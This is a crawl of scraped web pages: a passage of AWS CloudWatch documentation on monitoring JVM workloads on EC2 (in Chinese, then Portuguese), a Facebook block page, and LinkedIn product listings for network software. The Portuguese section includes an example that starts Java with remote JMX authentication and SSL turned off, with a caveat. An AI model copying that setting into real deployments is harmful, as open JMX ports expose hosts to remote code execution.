进程组的实例的指标进行分组,从而在解决方案控制面板中提供集群、应用程序和服务性能的统一视图。 例如,如果您在同一个账户中运行两个 Java 应用程序,一个用于 order-processing 应用程序,另一个用于 inventory-management 应用程序,则应在每个实例的代理配置中相应地设置 ProcessGroupName 维度。 对于 order-processing 应用程序实例,设置 ProcessGroupName=order-processing 。 对于 inventory-management 应用程序实例,设置 ProcessGroupName=inventory-management 。 当您遵循这些准则时,解决方案控制面板将自动根据 ProcessGroupName 维度对指标进行分组。控制面板将包括下拉选项,用于选择和查看特定进程组的指标,从而允许您单独监测各个进程组的性能。 JVM 主机的代理配置 在部署 Java 应用程序的 EC2 实例上使用以下 CloudWatch 代理配置。配置将作为参数存储在 SSM 的 Parameter Store 中,稍后将在 步骤 2:在 Systems Manager Parameter Store 中存储建议的 CloudWatch 代理配置文件 中详细介绍。 将 ProcessGroupName 替换为进程组的名称。将 port-number 替换为 Java 应用程序的 JMX 端口。如果 JMX 启用了密码身份验证或 SSL 以进行远程访问,请参阅 收集 Java 管理扩展(JMX)指标 ,了解有关根据需要在代理配置中设置 TLS 或授权的信息。 此配置(在 JMX 区块之外显示的配置)中显示的 EC2 指标仅适用于 Linux 和 macOS 实例。如果您使用的是 Windows 实例,则可以选择在配置中省略这些指标。有关在 Windows 实例上收集的指标的信息,请参阅 Windows Server 实例上的 CloudWatch 代理收集的指标 。 { "metrics": { "namespace": "CWAgent", "append_dimensions": { "InstanceId": "$ { aws:InstanceId}" }, "metrics_collected": { "jmx": [ { "endpoint": "localhost: port-number ", "jvm": { "measurement": [ "jvm.classes.loaded", "jvm.gc.collections.count", "jvm.gc.collections.elapsed", "jvm.memory.heap.committed", "jvm.memory.heap.max", "jvm.memory.heap.used", "jvm.memory.nonheap.committed", "jvm.memory.nonheap.max", "jvm.memory.nonheap.used", "jvm.threads.count" ] }, "append_dimensions": { "ProcessGroupName": " ProcessGroupName " } } ], "disk": { "measurement": [ "used_percent" ] }, "mem": { "measurement": [ "used_percent" ] }, "swap": { "measurement": [ "used_percent" ] }, "netstat": { "measurement": [ "tcp_established", "tcp_time_wait" ] } } } } 为您的解决方案部署代理 安装 CloudWatch 代理有几种方法,具体视用例而定。对于此解决方案,我们建议使用 Systems Manager。它提供了控制台体验,使在单个 AWS 账户中管理一组托管服务器变得更加简单。本节中的说明使用 Systems Manager,适用于没有使用现有配置运行 CloudWatch 代理的情况。您可以按照 验证 CloudWatch 代理是否正在运行 中的步骤检查 CloudWatch 代理是否正在运行。 如果您已经在部署工作负载的 EC2 主机上运行 CloudWatch 代理并管理代理配置,则可以跳过本节中的说明并按照现有部署机制更新配置。请务必将 JVM 的代理配置与现有的代理配置合并,然后部署合并的配置。如果您使用 Systems Manager 存储和管理 CloudWatch 代理的配置,则可以将配置合并到现有参数值。有关更多信息,请参阅 Managing CloudWatch agent configuration files 。 注意 使用 Systems Manager 部署以下 CloudWatch 代理配置,将替换或覆盖 EC2 实例上任何现有的 CloudWatch 代理配置。您可以修改此配置以适应您独有的环境或用例。此解决方案中定义的指标是建议控制面板所需的最低要求。 部署过程包括以下步骤: 步骤 1:确保目标 EC2 实例具有所需的 IAM 权限。 步骤 2:在 Systems Manager Parameter Store 中存储建议的代理配置文件。 步骤 3:使用 CloudFormation 堆栈在一个或多个 EC2 实例上安装 CloudWatch 代理。 步骤 4:验证代理设置是否正确配置。 步骤 1:确保目标 EC2 实例具有所需的 IAM 权限 您必须授予 Systems Manager 安装和配置 CloudWatch 代理的权限。您还必须授予 CloudWatch 代理将遥测数据从 EC2 实例发布到 CloudWatch 的权限。确保附加到实例的 IAM 角色已附加 CloudWatchAgentServerPolicy 和 AmazonSSMManagedInstanceCore IAM 策略。 创建角色后,将该角色附加到 EC2 实例。在启动新的 EC2 实例时,按照 启动带有 IAM 角色的实例 中的步骤进行操作以附加角色。要将角色附加到现有 EC2 实例,请按照 将 IAM 角色附加到实例 中的步骤进行操作。 步骤 2:在 Systems Manager Parameter Store 中存储建议的 CloudWatch 代理配置文件 Parameter Store 通过安全地存储和管理配置参数,简化了 CloudWatch 代理在 EC2 实例上的安装,而无需硬编码值。这可确保更加安全灵活的部署过程,从而实现集中管理,并且可以更轻松地跨多个实例更新配置。 使用以下步骤将建议的 CloudWatch 代理配置文件作为参数存储在 Parameter Store 中。 创建 CloudWatch 代理配置文件作为参数 访问 https://console.aws.amazon.com/systems-manager/ ,打开 AWS Systems Manager 控制台。 从导航窗格中,依次选择 应用程序管理 、 Parameter Store 。 按照以下步骤为配置创建新参数。 选择 创建参数 。 在 名称 框中,输入您将在后续步骤中用来引用 CloudWatch 代理配置文件的名称。例如 AmazonCloudWatch-JVM-Configuration 。 (可选)在 描述 框中,键入参数的描述。 对于 参数层 ,选择 标准 。 对于 类型 ,选择 字符串 。 对于 数据类型 ,选择 文本 。 在 值 框中,粘贴 JVM 主机的代理配置 中列出的相应 JSON 块。请务必按照所述自定义分组维度值和端口号。 选择 创建参数 。 步骤 3:安装 CloudWatch 代理并使用 CloudFormation 模板应用配置 您可以使用 AWS CloudFormation 安装代理,并将其配置为使用您在前面步骤中创建的 CloudWatch 代理配置。 为此解决方案安装和配置 CloudWatch 代理 使用以下链接打开 CloudFormation 快速创建堆栈 向导: https://console.aws.amazon.com/cloudformation/home?#/stacks/quickcreate?templateURL=https://aws-observability-solutions-prod-us-east-1.s3.us-east-1.amazonaws.com/CloudWatchAgent/CFN/v1.0.0/cw-agent-installation-template-1.0.0.json 。 确认控制台上的所选区域是运行 JVM 工作负载的区域。 对于 堆栈名称 ,输入用于识别此堆栈的名称,如 CWAgentInstallationStack 。 在 参数 部分中,指定以下各项: 对于 CloudWatchAgentConfigSSM ,请输入您之前创建的代理配置的 Systems Manager 参数名称,例如 AmazonCloudWatch-JVM-Configuration 。 要选择目标实例,您有两种选择。 对于 InstanceIds ,请指定一个以逗号分隔的实例 ID 列表,其中包含希望使用此配置安装 CloudWatch 代理的实例 ID。您可以列出一个或多个实例。 如果要大规模部署,则可以指定 TagKey 和相应的 TagValue ,以将具有此标签和值的所有 EC2 实例作为目标。如果指定 TagKey ,则必须指定相应的 TagValue 。(对于自动扩缩组,为 TagKey 指定 aws:autoscaling:groupName 并为 TagValue 指定自动扩缩组名称,以部署到自动扩缩组内的所有实例。) 如果同时指定了 InstanceIds 和 TagKeys 参数,将优先采用 InstanceIds ,而标签将被忽略。 检查设置,然后选择 创建堆栈 。 如果要先编辑模板文件进行自定义,请选择 创建堆栈向导 下的 上传模板文件 选项,上传编辑后的模板。有关更多信息,请参阅 在 CloudFormation 控制台上创建堆栈 。您可以使用以下链接下载模板: https://aws-observability-solutions-prod-us-east-1.s3.us-east-1.amazonaws.com/CloudWatchAgent/CFN/v1.0.0/cw-agent-installation-template-1.0.0.json 。 注意 完成此步骤后,此 Systems Manager 参数将与目标实例中运行的 CloudWatch 代理相关联。这意味着: 如果删除 Systems Manager 参数,代理将停止。 如果编辑了 Systems Manager 参数,则配置更改将按计划频率(默认为 30 天)自动应用到代理。 如果要立即应用对此 Systems Manager 参数的更改,则必须再次运行此步骤。有关关联的更多信息,请参阅 在 Systems Manager 中使用关联 。 步骤 4:验证代理设置是否正确配置 您可以按照 验证 CloudWatch 代理是否正在运行 中的步骤验证 CloudWatch 代理是否已安装。如果 CloudWatch 代理尚未安装和运行,请确保已正确设置所有内容。 请确保您已为 EC2 实例附加具有正确权限的角色,如 步骤 1:确保目标 EC2 实例具有所需的 IAM 权限 中所述。 请确保您已正确配置 Systems Manager 参数的 JSON。按照 对利用 CloudFormation 的 CloudWatch 代理安装进行故障排除 中的步骤操作。 如果一切设置正确,那么您应该会看到 JVM 指标发布到 CloudWatch。您可以查看 CloudWatch 控制台以验证这些指标是否已发布。 验证 JVM 指标是否已发布到 CloudWatch 通过 https://console.aws.amazon.com/cloudwatch/ 打开 CloudWatch 控制台。 选择 指标 、 所有指标 。 确保您已选择部署解决方案的区域,然后选择 自定义命名空间 、 CWAgent 。 搜索 JVM 主机的代理配置 中提及的指标,例如 jvm.memory.heap.used 。如果您看到这些指标的结果,则表明这些指标已发布到 CloudWatch。 创建 JVM 解决方案控制面板 此解决方案提供的控制面板显示服务器底层 Java 虚拟机(JVM)的指标。它通过聚合和显示所有实例的指标来提供 JVM 的概览,从而提供总体运行状况和运行状态的高级摘要。此外,控制面板还会显示每个指标排名靠前的贡献者(每个指标的前 10 名小部件)明细。这可以帮助您快速识别对观测指标有显著影响的异常值或实例。 解决方案控制面板不显示 EC2 指标。要查看 EC2 指标,您需要使用 EC2 自动控制面板查看 EC2 公开发布的指标,并使用 EC2 控制台控制面板查看 CloudWatch 代理收集的 EC2 指标。有关 AWS 服务自动控制面板的更多信息,请参阅 查看单项 AWS 服务的 CloudWatch 控制面板 。 要创建控制面板的操作,可以使用以下选项: 使用 CloudWatch 控制台创建控制面板。 使用 AWS CloudFormation 控制台部署控制面板。 以 AWS CloudFormation 基础设施即代码,并将其作为持续集成(CI)自动化的一部分进行集成。 通过使用 CloudWatch 控制台创建控制面板,您可以在实际创建和收费之前预览控制面板。 注意 此解决方案中使用 CloudFormation 创建的控制面板显示解决方案部署区域的指标。请务必在发布 JVM 指标的区域创建 CloudFormation 堆栈。 如果 CloudWatch 代理指标发布到与 CWAgent 不同的命名空间(例如,如果您提供了自定义命名空间),则必须更改 CloudFormation 配置,将 CWAgent 替换为您正在使用的自定义命名空间。 使用 CloudWatch 控制台创建控制面板 注意 解决方案控制面板目前仅显示 G1 Garbage Collector 的垃圾回收相关指标,G1 Garbage Collector 是最新 Java 版本的默认收集器。如果您使用的是不同的垃圾回收算法,则与垃圾回收相关的小部件为空。但是,您可以通过更改控制面板 CloudFormation 模板,并将相应的垃圾回收类型应用于垃圾回收相关指标的名称维度来自定义这些小部件。例如,如果您使用的是并行垃圾回收,请将垃圾回收计数指标 jvm.gc.collections.count 从 name=\"G1 Young Generation\" 更改为 name=\"Parallel GC\" 。 使用以下链接打开 CloudWatch 控制台 创建控制面板 : https://console.aws.amazon.com/cloudwatch/home?#dashboards?dashboardTemplate=JvmOnEc2&referrer=os-catalog 。 确认控制台上的所选区域是运行 JVM 工作负载的区域。 输入控制面板的名称,然后选择 创建控制面板 。 为了便于将此控制面板与其他区域的类似控制面板区分开来,我们建议在控制面板名称中包含区域名称,例如 JVMDashboard-us-east-1 。 预览控制面板并选择 保存 以创建控制面板。 通过 CloudFormation 创建控制面板 使用以下链接打开 CloudFormation 快速创建堆栈 向导: https://console.aws.amazon.com/cloudformation/home?#/stacks/quickcreate?templateURL=https://aws-observability-solutions-prod-us-east-1.s3.us-east-1.amazonaws.com/JVM_EC2/CloudWatch/CFN/v1.0.0/dashboard-template-1.0.0.json 。 确认控制台上的所选区域是运行 JVM 工作负载的区域。 对于 堆栈名称 ,输入用于识别此堆栈的名称,如 JVMDashboardStack 。 在 参数 部分,在 DashboardName 参数下指定控制面板的名称。 为了便于将此控制面板与其他区域的类似控制面板区分开来,我们建议在控制面板名称中包含区域名称,例如 JVMDashboard-us-east-1 。 在 功能和转换 下确认转换的访问功能。请注意,CloudFormation 不会添加任何 IAM 资源。 检查设置,然后选择 创建堆栈 。 堆栈状态为 CREATE_COM PLETE 后,选择创建的堆栈下的 资源 选项卡,然后选择 物理 ID 下的链接转至控制面板。您也可以通过在控制台左侧导航窗格中选择 控制面板 ,然后在 自定义控制面板 下找到控制面板名称,在 CloudWatch 控制台中访问控制面板。 如果要编辑模板文件以出于任何目的对其进行自定义,则可以使用 创建堆栈向导 下的 上传模板文件 选项来上传编辑后的模板。有关更多信息,请参阅 在 CloudFormation 控制台上创建堆栈 。您可以使用以下链接下载模板: https://aws-observability-solutions-prod-us-east-1.s3.us-east-1.amazonaws.com/JVM_EC2/CloudWatch/CFN/v1.0.0/dashboard-template-1.0.0.json 。 注意 解决方案控制面板目前仅显示 G1 Garbage Collector 的垃圾回收相关指标,G1 Garbage Collector 是最新 Java 版本的默认收集器。如果您使用的是不同的垃圾回收算法,则与垃圾回收相关的小部件为空。但是,您可以通过更改控制面板 CloudFormation 模板,并将相应的垃圾回收类型应用于垃圾回收相关指标的名称维度来自定义这些小部件。例如,如果您使用的是并行垃圾回收,请将垃圾回收计数指标 jvm.gc.collections.count 从 name=\"G1 Young Generation\" 更改为 name=\"Parallel GC\" 。 开始使用 JVM 控制面板 您可以使用新的 JVM 控制面板尝试以下几项任务。这些任务允许您验证控制面板是否正常运行,并为您提供使用它来监测 JVM 进程组的一些实践经验。在尝试这些任务的过程中,您将熟悉如何浏览控制面板和解读可视化指标。 选择进程组 使用 JVM 进程组名称 下拉列表可选择要监测的进程组。控制面板会自动更新以显示所选进程组的指标。如果您有多个 Java 应用程序或环境,则每个应用程序或环境都可能表示为一个单独的进程组。选择相应的进程组可确保您查看的是要分析的应用程序或环境的特定指标。 查看内存使用情况 从控制面板概览部分中,找到 堆内存使用百分比 和 非堆内存使用百分比 小部件。这些小部件显示所选进程组中所有 JVM 使用的堆内存和非堆内存的百分比。百分比高表示可能导致性能问题或 OutOfMemoryError 异常的潜在内存压力。您还可以在 按主机分列的内存使用情况 下深入查看按主机分列的堆使用情况,以检查使用率较高的主机。 分析已加载的线程和类 在 按主机分列的已加载线程和类 部分中,找到 线程数前 10 名 和 加载的类前 10 名 小部件。查找与其他 JVM 相比,线程或类数量异常多的 JVM。线程过多可能表示线程泄漏或并发量过大,而大量已加载的类可能表明潜在的类加载器泄漏或动态类生成效率低下。 确定垃圾回收问题 在 垃圾回收 部分,找到以下不同垃圾回收器类型的 每分钟垃圾回收调用次数前 10 名 和 垃圾回收持续时间前 10 名 小部件: 较新 、 并发 和 混合 。查找与其他 JVM 相比,回收次数异常多或回收持续时间较长的 JVM。这可能表示存在配置问题或内存泄漏。 Javascript 在您的浏览器中被禁用或不可用。 要使用 Amazon Web Services 文档,必须启用 Javascript。请参阅浏览器的帮助页面以了解相关说明。 文档惯例 CloudWatch 可观测性解决方案 EC2 上的 NGINX 工作负载 此页面对您有帮助吗?- 是 感谢您对我们工作的肯定! 如果不耽误您的时间,请告诉我们做得好的地方,让我们做得更好。 此页面对您有帮助吗?- 否 感谢您告诉我们本页内容还需要完善。很抱歉让您失望了。 如果不耽误您的时间,请告诉我们如何改进文档。 | 2026-01-13T09:29:26 |
https://www.facebook.com/login/?next=https%3A%2F%2Fl.facebook.com%2Fl.php%3Fu%3Dhttps%253A%252F%252Fwww.instagram.com%252F%26amp%253Bh%3DAT2FpiAS5Z4gP0BLmRzfuo4BALg9YPzbZ9ghFRCmHt3Onrjp0xwiTLO3A5FDz8P8Zb_hiTX9tVT5JFDef74sOVyazw7vZoOm5R2kajYZw6QBHjevx_fbeeJTebCYVomRxu2_hRi-_Wu4ggdu | Facebook Facebook 이메일 또는 휴대폰 비밀번호 계정을 잊으셨나요? 새 계정 만들기 일시적으로 차단됨 일시적으로 차단됨 회원님의 이 기능 사용 속도가 너무 빠른 것 같습니다. 이 기능 사용에서 일시적으로 차단되었습니다. Back 한국어 English (US) Tiếng Việt Bahasa Indonesia ภาษาไทย Español 中文(简体) 日本語 Português (Brasil) Français (France) Deutsch 가입하기 로그인 Messenger Facebook Lite 동영상 Meta Pay Meta 스토어 Meta Quest Ray-Ban Meta Meta AI Meta AI 콘텐츠 더 보기 Instagram Threads 투표 정보 센터 개인정보처리방침 개인정보 보호 센터 정보 광고 만들기 페이지 만들기 개발자 채용 정보 쿠키 AdChoices 이용 약관 고객 센터 연락처 업로드 및 비사용자 설정 활동 로그 Meta © 2026 | 2026-01-13T09:29:26 |
https://www.linkedin.com/products/technarts-inventum/ | Inventum | LinkedIn Skip to main content LinkedIn TechNarts-Nart Bilişim in Asan Expand search This button displays the currently selected search type. When expanded it provides a list of search options that will switch the search inputs to match the current selection. Jobs People Learning Clear text Clear text Clear text Clear text Clear text Join now Sign in Inventum Network Monitoring Software by TechNarts-Nart Bilişim See who's skilled in this Add as skill Contact us Report this product About Inventum is an up-to-date and valid data source that automatically discovers inventory by connecting to NMS, EMS, or the equipment itself. It supports industry standards such as SNMP, ICMP, CLI, XML/Rest API, and Corba for the collection process. It covers the entire network regardless of technology and vendor and finds the root causes of problems through impact analysis. It provides better management and quick troubleshooting with reports and dashboards such as IP conflicts, misconfigurations, topology reports, redundancy check reports, etc. Featured customers of Inventum Turkcell Telecommunications 584,615 followers Similar products NMS NMS Network Monitoring Software Network Operations Center (NOC) Network Operations Center (NOC) Network Monitoring Software Arbor Sightline Arbor Sightline Network Monitoring Software TEMS™ Suite TEMS™ Suite Network Monitoring Software Progress Flowmon Progress Flowmon Network Monitoring Software ASM ASM Network Monitoring Software Sign in to see more Show more Show less TechNarts-Nart Bilişim products MoniCAT MoniCAT Network Monitoring Software Numerus Numerus IP Address Management (IPAM) Software Redkit Redkit Software Configuration Management (SCM) Tools Star Suite Star Suite Network Monitoring Software TART TART Network Traffic Analysis (NTA) Tools Show more Show less LinkedIn © 2026 About Accessibility User Agreement Privacy Policy Cookie Policy Copyright Policy Brand Policy Guest Controls Community Guidelines English (English) Language | 2026-01-13T09:29:26 |
https://www.linkedin.com/products/axiros-ax-dhcp-ip-address-management-ipam-software/?trk=products_details_guest_similar_products_section_similar_products_section_product_link_result-card_full-click | AX DHCP | IP Address Management (IPAM) Software | LinkedIn Skip to main content LinkedIn Axiros in Asan Expand search This button displays the currently selected search type. When expanded it provides a list of search options that will switch the search inputs to match the current selection. Jobs People Learning Clear text Clear text Clear text Clear text Clear text Join now Sign in AX DHCP | IP Address Management (IPAM) Software IP Address Management (IPAM) Software by Axiros See who's skilled in this Add as skill Request demo Report this product About AX DHCP server is a clusterable carrier-grade DHCP / IPAM (IP Address Management) solution that can be seamlessly integrated within given provisioning platforms. AX DHCP copes with FttH, ONT provisioning, VOIP and IPTV services. Telecommunications carriers and internet service providers (ISPs) need powerful and robust infrastructure that supports future workloads. DDI (DNS-DHCP-IPAM) is a critical networking technology for every service provider that ensures customer services availability, security and performance. Media Products media viewer No more previous content AX DHCP AX DHCP AX DHCP DHCP AX DHCP | Presentation No more next content Similar products Next-Gen IPAM Next-Gen IPAM IP Address Management (IPAM) Software Tidal LightMesh Tidal LightMesh IP Address Management (IPAM) Software ManageEngine OpUtils ManageEngine OpUtils IP Address Management (IPAM) Software Numerus Numerus IP Address Management (IPAM) Software dedicated datacenter proxies dedicated datacenter proxies IP Address Management (IPAM) Software Sign in to see more Show more Show less Axiros products AX BIZ | Business Router Management Software AX BIZ | Business Router Management Software Network Management Software AX DOCSIS | Carrier Grade DOCSIS Provisioning AX DOCSIS | Carrier Grade DOCSIS Provisioning AX MOBILITY | SDK For Mobile Apps AX MOBILITY | SDK For Mobile Apps Software Development Kits (SDK) AX USP | Controller AX USP | Controller Axiros AXACT | Embedded Connectivity Axiros AXACT | Embedded Connectivity Internet of Things (IoT) Software Axiros AXESS | TR-069 Auto Configuration Server (ACS) Axiros AXESS | TR-069 Auto Configuration Server (ACS) Internet of Things (IoT) Software Axiros AXTRACT | QoE Monitoring Axiros AXTRACT | QoE Monitoring Predictive Analytics Software AXWIFI | WiFi Optimization & Management Software AXWIFI | WiFi Optimization & Management Software Predictive Analytics Software Show more Show less LinkedIn © 2026 About Accessibility User Agreement Privacy Policy Cookie Policy Copyright Policy Brand Policy Guest Controls Community Guidelines English (English) Language | 2026-01-13T09:29:26 |
https://docs.aws.amazon.com/pt_br/AmazonCloudWatch/latest/monitoring/Solution-JVM-On-EC2.html#Solution-JVM-Agent-Deploy | Solução do CloudWatch: workload da JVM no Amazon EC2 - Amazon CloudWatch Solução do CloudWatch: workload da JVM no Amazon EC2 - Amazon CloudWatch Documentação Amazon CloudWatch Guia do usuário Requisitos Benefícios Custos Configuração do agente do CloudWatch para esta solução Implantação do agente para a sua solução Criação de um painel para a solução da JVM Solução do CloudWatch: workload da JVM no Amazon EC2 Esta solução auxilia na configuração da coleta de métricas prontas para uso com agentes do CloudWatch para aplicações da JVM que estão sendo executadas em instâncias do EC2. Além disso, a solução ajuda na configuração de um painel do CloudWatch configurado previamente. Para obter informações gerais sobre todas as soluções de observabilidade do CloudWatch, consulte Soluções de observabilidade do CloudWatch . Tópicos Requisitos Benefícios Custos Configuração do agente do CloudWatch para esta solução Implantação do agente para a sua solução Criação de um painel para a solução da JVM Requisitos Esta solução é aplicável nas seguintes condições: Versões compatíveis: versões LTS do Java 8, 11, 17 e 21 Computação: Amazon EC2 Fornecimento de suporte para até 500 instâncias do EC2 em todas as workloads da JVM em uma Região da AWS específica Versão mais recente do agente do CloudWatch SSM Agent instalado na instância do EC2 nota O AWS Systems Manager (SSM Agent) está instalado previamente em algumas imagens de máquinas da Amazon (AMIs) fornecidas pela AWS e por entidades externas confiáveis. Se o agente não estiver instalado, você poderá instalá-lo manualmente usando o procedimento adequado para o seu tipo de sistema operacional. Instalar e desinstalar o SSM Agent manualmente em instâncias do EC2 para Linux Instalar e desinstalar o SSM Agent manualmente em instâncias do EC2 para macOS Instalar e desinstalar o SSM Agent manualmente em instâncias do EC2 para Windows Server Benefícios A solução disponibiliza monitoramento da JVM, fornecendo insights valiosos para os seguintes casos de uso: Monitoramento do uso de memória do heap e de memória não relacionada ao heap da JVM. Análise de threads e de carregamento de classes para identificar problemas de simultaneidade. Rastreamento da coleta de resíduos para identificar possíveis vazamentos de memória. Alternância entre diferentes aplicações da JVM configuradas pela solução na mesma conta. A seguir, apresentamos as principais vantagens da solução: Automatiza a coleta de métricas para a JVM usando a configuração do agente do CloudWatch, o que elimina a necessidade de instrumentação manual. Fornece um painel do CloudWatch consolidado e configurado previamente para as métricas da JVM. O painel gerenciará automaticamente as métricas das novas instâncias do EC2 para a JVM que foram configuradas usando a solução, mesmo que essas métricas não estejam disponíveis no momento de criação do painel. Além disso, o painel permite agrupar as métricas em aplicações lógicas para facilitar o foco e o gerenciamento. A imagem apresentada a seguir é um exemplo do painel para esta solução. Custos Esta solução cria e usa recursos em sua conta. A cobrança será realizada com base no uso padrão, que inclui o seguinte: Todas as métricas coletadas pelo agente do CloudWatch são cobradas como métricas personalizadas. O número de métricas usadas por esta solução depende do número de hosts do EC2. Cada host da JVM configurado para a solução publica um total de 18 métricas, além de uma métrica ( disk_used_percent ) cuja contagem de métricas depende do número de caminhos fornecidos para o host. Um painel personalizado. As operações da API solicitadas pelo agente do CloudWatch para publicar as métricas. Com a configuração padrão para esta solução, o agente do CloudWatch chama a operação PutMetricData uma vez por minuto para cada host do EC2. Isso significa que a API PutMetricData será chamada 30*24*60=43,200 em um mês com 30 dias para cada host do EC2. Para obter mais informações sobre os preços do CloudWatch, consulte Preço do Amazon CloudWatch . A calculadora de preços pode ajudar a estimar os custos mensais aproximados para o uso desta solução. Como usar a calculadora de preços para estimar os custos mensais da solução Abra a calculadora de preços do Amazon CloudWatch . Em Escolher uma região , selecione a região em que você gostaria de implantar a solução. Na seção Métricas , em Número de métricas , insira (18 + average number of disk paths per EC2 host) * number of EC2 instances configured for this solution . Na seção APIs , em Número de solicitações de API , insira 43200 * number of EC2 instances configured for this solution . Por padrão, o agente do CloudWatch executa uma operação PutMetricData a cada minuto para cada host do EC2. Na seção Painéis e alarmes , em Número de painéis , insira 1 . É possível visualizar os custos mensais estimados na parte inferior da calculadora de preços. Configuração do agente do CloudWatch para esta solução O agente do CloudWatch é um software que opera de maneira contínua e autônoma em seus servidores e em ambientes com contêineres. Ele coleta métricas, logs e rastreamentos da infraestrutura e das aplicações e os envia para o CloudWatch e para o X-Ray. Para obter mais informações sobre o agente do CloudWatch, consulte Coleta de métricas, logs e rastreamentos usando o agente do CloudWatch . A configuração do agente nesta solução coleta as métricas fundamentais para a solução. O agente do CloudWatch pode ser configurado para coletar mais métricas da JVM do que as que são exibidas por padrão no painel. Para obter uma lista de todas as métricas da JVM que você pode coletar, consulte Coletar métricas da JVM . Para obter informações gerais sobre a configuração do agente do CloudWatch, consulte Métricas coletadas pelo atendente do CloudWatch . Exposição de portas do JMX para a aplicação da JVM O agente do CloudWatch depende do JMX para coletar as métricas relacionadas ao processo da JVM. Para que isso aconteça, é necessário expor a porta do JMX da aplicação da JVM. As instruções para expor a porta do JMX dependem do tipo de workload que você está usando para a aplicação da JVM. Consulte a documentação específica para a aplicação para encontrar essas instruções. De maneira geral, para habilitar uma porta do JMX para monitoramento e gerenciamento, você precisa configurar as propriedades do sistema apresentadas a seguir para a aplicação da JVM. Certifique-se de especificar um número de porta que não esteja em uso. O exemplo apresentado a seguir configura o JMX sem autenticação. Se suas políticas ou seus requisitos de segurança exigirem que você habilite o JMX com autenticação por senha ou SSL para a obtenção de acesso remoto, consulte a documentação do JMX para definir a propriedade necessária. -Dcom.sun.management.jmxremote -Dcom.sun.management.jmxremote.port= port-number -Dcom.sun.management.jmxremote.authenticate=false -Dcom.sun.management.jmxremote.ssl=false Analise os scripts de inicialização e os arquivos de configuração da aplicação para encontrar o local mais adequado para adicionar esses argumentos. Quando você executar um arquivo .jar usando a linha de comando, o comando pode ser semelhante ao apresentado a seguir, em que pet-search.jar é o nome do arquivo JAR da aplicação. $ java -jar -Dcom.sun.management.jmxremote -Dcom.sun.management.jmxremote.port=9999 -Dcom.sun.management.jmxremote.authenticate=false -Dcom.sun.management.jmxremote.ssl=false pet-search.jar Configuração do agente para esta solução As métricas coletadas pelo agente são definidas na configuração do agente. A solução fornece configurações do agente para a coleta das métricas recomendadas com dimensões adequadas para o painel da solução. As etapas para a implantação da solução são descritas posteriormente em Implantação do agente para a sua solução . As informações apresentadas a seguir são destinadas a ajudar você a compreender como personalizar a configuração do agente para o seu ambiente. Você deve personalizar algumas partes da seguinte configuração do agente para o seu ambiente: O número da porta do JMX corresponde ao número da porta que você configurou na seção anterior desta documentação. Esse número está na linha endpoint na configuração. ProcessGroupName : forneça nomes significativos para a dimensão ProcessGroupName . Esses nomes devem representar o agrupamento de clusters, de aplicações ou de serviços para as instâncias do EC2 que executam aplicações ou processos semelhantes. Isso auxilia no agrupamento de métricas de instâncias que pertencem ao mesmo grupo de processos da JVM, proporcionando uma visão unificada da performance do cluster, da aplicação e do serviço no painel da solução. Por exemplo, caso você tenha duas aplicações em Java em execução na mesma conta, sendo uma para a aplicação order-processing e a outra para a aplicação inventory-management , é necessário configurar as dimensões ProcessGroupName de maneira adequada na configuração do agente de cada instância. Para as instâncias da aplicação order-processing , defina ProcessGroupName=order-processing . Para as instâncias da aplicação inventory-management , defina ProcessGroupName=inventory-management . Ao seguir essas diretrizes, o painel da solução agrupará automaticamente as métricas com base na dimensão ProcessGroupName . O painel incluirá opções do menu suspenso para a seleção e para a visualização de métricas de um grupo de processos específico, permitindo o monitoramento da performance de grupos de processos individuais separadamente. Configuração do agente para hosts da JVM Use a configuração do agente do CloudWatch apresentada a seguir nas instâncias do EC2 em que as aplicações em Java estão implantadas. A configuração será armazenada como um parâmetro no Parameter Store do SSM, conforme detalhado posteriormente em Etapa 2: armazenar o arquivo de configuração recomendado do agente do CloudWatch no Systems Manager Parameter Store . Substitua ProcessGroupName pelo nome do grupo de processos. Substitua port-number pelo número da porta do JMX da aplicação em Java. Se o JMX tiver sido habilitado com autenticação por senha ou SSL para acesso remoto, consulte Coletar métricas do Java Management Extensions (JMX) para obter informações sobre como configurar o TLS ou a autorização na configuração do agente, conforme necessário. As métricas do EC2 mostradas nesta configuração (configuração apresentada de forma externa ao bloco do JMX) funcionam somente para instâncias do Linux e do macOS. Caso esteja usando instâncias do Windows, é possível optar por omitir essas métricas na configuração. Para obter mais informações sobre as métricas coletadas em instâncias do Windows, consulte Métricas coletadas pelo atendente do CloudWatch em instâncias do Windows Server . { "metrics": { "namespace": "CWAgent", "append_dimensions": { "InstanceId": "$ { aws:InstanceId}" }, "metrics_collected": { "jmx": [ { "endpoint": "localhost: port-number ", "jvm": { "measurement": [ "jvm.classes.loaded", "jvm.gc.collections.count", "jvm.gc.collections.elapsed", "jvm.memory.heap.committed", "jvm.memory.heap.max", "jvm.memory.heap.used", "jvm.memory.nonheap.committed", "jvm.memory.nonheap.max", "jvm.memory.nonheap.used", "jvm.threads.count" ] }, "append_dimensions": { "ProcessGroupName": " ProcessGroupName " } } ], "disk": { "measurement": [ "used_percent" ] }, "mem": { "measurement": [ "used_percent" ] }, "swap": { "measurement": [ "used_percent" ] }, "netstat": { "measurement": [ "tcp_established", "tcp_time_wait" ] } } } } Implantação do agente para a sua solução Existem várias abordagens para instalar o agente do CloudWatch, dependendo do caso de uso. Recomendamos o uso do Systems Manager para esta solução. Ele fornece uma experiência no console e simplifica o gerenciamento de uma frota de servidores gerenciados em uma única conta da AWS. As instruções apresentadas nesta seção usam o Systems Manager e são destinadas para situações em que o agente do CloudWatch não está em execução com as configurações existentes. É possível verificar se o agente do CloudWatch está em execução ao seguir as etapas apresentadas em Verificar se o atendente do CloudWatch está em execução . Se você já estiver executando o agente do CloudWatch nos hosts do EC2 nos quais a workload está implantada e gerenciando as configurações do agente, pode pular as instruções apresentadas nesta seção e usar o mecanismo de implantação existente para atualizar a configuração. Certifique-se de combinar a configuração do agente da JVM com a configuração do agente existente e, em seguida, implante a configuração combinada. Se você estiver usando o Systems Manager para armazenar e gerenciar a configuração do agente do CloudWatch, poderá combinar a configuração com o valor do parâmetro existente. Para obter mais informações, consulte Managing CloudWatch agent configuration files . nota Ao usar o Systems Manager para implantar as configurações do agente do CloudWatch apresentadas a seguir, qualquer configuração existente do agente do CloudWatch nas suas instâncias do EC2 será substituída ou sobrescrita. É possível modificar essa configuração para atender às necessidades do ambiente ou do caso de uso específico. As métricas definidas nesta solução representam o requisito mínimo para o painel recomendado. O processo de implantação inclui as seguintes etapas: Etapa 1: garantir que as instâncias do EC2 de destino têm as permissões do IAM necessárias. Etapa 2: armazenar o arquivo de configuração recomendado do agente no Systems Manager Parameter Store. Etapa 3: instalar o agente do 